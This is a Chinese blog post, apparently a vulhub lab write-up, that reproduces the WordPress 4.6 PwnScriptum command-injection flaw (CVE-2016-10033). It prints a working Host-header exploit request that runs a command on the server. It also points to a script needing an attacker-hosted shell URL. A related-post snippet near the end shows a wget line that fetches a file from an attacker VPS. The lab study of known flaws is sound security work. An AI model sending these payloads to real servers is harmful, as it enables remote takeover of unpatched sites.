Wordpress 4.6 任意命令执行漏洞(PwnScriptum)

最新推荐文章于 2024-04-29 00:03:14 发布
最新推荐文章于 2024-04-29 00:03:14 发布
阅读量460 收藏 2
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: 安全 wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/119838485
版权

漏洞详细

详细务必请看:https://github.com/vulhub/vulhub/blob/master/wordpress/pwnscriptum/README.zh-cn.md

漏洞复现

发送如下数据包,可见/tmp/success已经成功创建:

POST /wp-login.php?action=lostpassword HTTP/1.1
Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null)
Connection: close
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Accept: */*
Content-Length: 56
Content-Type: application/x-www-form-urlencoded

wp-submit=Get+New+Password&redirect_to=&user_login=admin

在这里插入图片描述

有关于payload的详细务必请看以上文章链接!
自行利用相对麻烦,所以作者也是很贴心的写了个脚本以供我们使用!
将脚本中target修改成你的目标,user修改成一个已经存在的用户,shell_url修改成你放置payload的网址。
在这里插入图片描述
如果利用失败,请多看看链接文章中的坑!

小 白 萝 卜
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wordpress pwnscriptum复现(超详细呀)
2301_76467680的博客
06-29 158
然后点击外观点击编辑点击404模板。
wordpress 4.6任意命令执行漏洞PwnScriptum)复现
永远是少年
12-31 1470
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞PwnScriptum)复现。 一、wordpress 4.6任意命令执行漏洞PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞PwnScriptum)复现
pwnscriptum漏洞复现
最新发布
m0_74402888的博客
04-29 596
1.在IDEA中建立好了SpringBoot项目,并配置好了docker容器,然后在执行Dockerfile时出现以下问题Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting head..._registry-1.docker.io。然后点击外观点击编辑点击404模板。这个目录文件是公开的。
【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞
qq_45300786的博客
04-16 1062
访问地址:http://your-ip:8080/wp-login.php 这里我就简单说下需要特别注意的地方。 1、payload中run{}里面所有 / 用 ${substr{0}{1}{$spool_directory}} 代替 2、payload中run{}里面所有 空格 用 ${substr{10}{1}{$tod_log}} 代替 Payload,在tmp处添加success文件 aa(any -froot@localhost -be ${run{/bin/touch /tmp/success
【vulhub】Wordpress 4.6 pwnscriptum 任意命令执行漏洞(CVE-2016-10033)
weixin_42884199的博客
12-06 379
一、启动靶机 docker-compose build docker-compose up -d 访问URL进行install: http://192.168.150.146:8080 二、生成payload 前提:命令中 空格 用 ${substr{10}{1}{$tod_log}}代替 / 用 ${substr{0}{1}{$spool_directory}}代替 命令: /usr/bin/wget --output-document /tmp/rce vps_ip/a.txt payload:
Vulhub靶场WordPress4.6命令执行PwnScriptum漏洞复现
X_python321的博客
07-11 625
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞
WordPress v4.6 正式版
12-05
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
wordpress-4.6.zip简体中文版
08-31
WordPress 4.6简体中文版是WordPress开源内容管理系统的一个特定版本,专为中文用户设计。这个版本在2016年发布,带来了许多新功能、改进和优化,旨在提升用户体验和网站管理效率。以下是对WordPress 4.6中一些重要...
WordPress v4.6 RC2
12-05
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
WordPress v4.6 beta1
12-06
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
WordPress v4.6 beta2
12-06
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对...
WordPress博客出现的绝对路径泄露漏洞及修复方法
09-28
主要介绍了WordPress出现的绝对路径泄露漏洞及修复方法,需要的朋友可以参考下
Wordpress 4.6 任意命令执行漏洞
m0_63241485的博客
08-17 1117
WordPress是一款个人博客系统,并逐步演化成一款内容管理系统软件,它是使用PHP语言和MySQL数据库开发的,用户可以在支持 PHP 和 MySQL数据库的服务器上使用自己的博客。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用。不过要做一个自己的模板,需要你有一定的专业知识。WordPress官方支持中文版,同时有爱好者开发的第三方中文语言包,如wopus中文语言包。...
WordPress 4.6远程执行代码漏洞
菜鸟耿耿
10-08 1208
WordPress 4.6远程执行代码漏洞漏洞复现) 漏洞编码: CVE-2016-10033 漏洞简述: WordPress 4.6 版本远程代码执行漏洞是一个非常严重的漏洞,未经授权的攻击者利用该漏洞就能实现远程代码执行,针对目标服务器实现即时访问,最终导致目标应用服务器的完全陷落。远程攻击者可以利用该漏洞执行代码。 漏洞版本: WordPress <= 4.6.0 PHPMailer < 5.2.18 漏洞原理: 主要是phpmailer组件调用linux系统命令sendmail进行邮件
【WEB攻防】WordPress <= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033) 安鸾靶场详细复现 -WordPress1
AAAAAAAAAAAA66的博客
01-04 2016
中华人民共和国网络安全法(出版物)_360百科中华人民共和国网络安全法,《中华人民共和国网络安全法》是为保障网络安全,维护网络空间主权和国家安全、社会公共利益,保护公民、法人和其他组织的合法权益,促进经济社会信息化健康发展而制定的法律。《中华人民共和国网络安全法》由中华人民共和国第十二届全国人民代表大会常务委员会第二十四次会议于2016年11月7日通过,自2017年6月1日起施行。https://baike.so.com/doc/24210940-24838928.html 目录 漏洞简介 工具 题
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3426
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行
【vulhub】WordPress pwnscriptum漏洞复现
qq_58873970的博客
09-04 214
phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload。
WordPress小于等于4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验
Hvnt3r的博客
05-28 1289
WordPress &lt;= 4.6 命令执行漏洞(PHPMailer)(CVE-2016-10033)实验 0x00 此漏洞利用的是HTTP头部注入,参考资料:http://www.freebuf.com/articles/web/164817.html 首先祭出实验来源:http://vulapps.evalbug.com/w_wordpress_6/ 实验环境需要docker来...
wordpress 漏洞
03-29
WordPress是一种流行的开源内容管理系统(CMS),但它也有一些漏洞。以下是一些常见的WordPress漏洞: 1. SQL注入漏洞:攻击者可以通过SQL注入攻击访问数据库,从而获取敏感信息。 2. XSS漏洞:攻击者可以在网站上...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值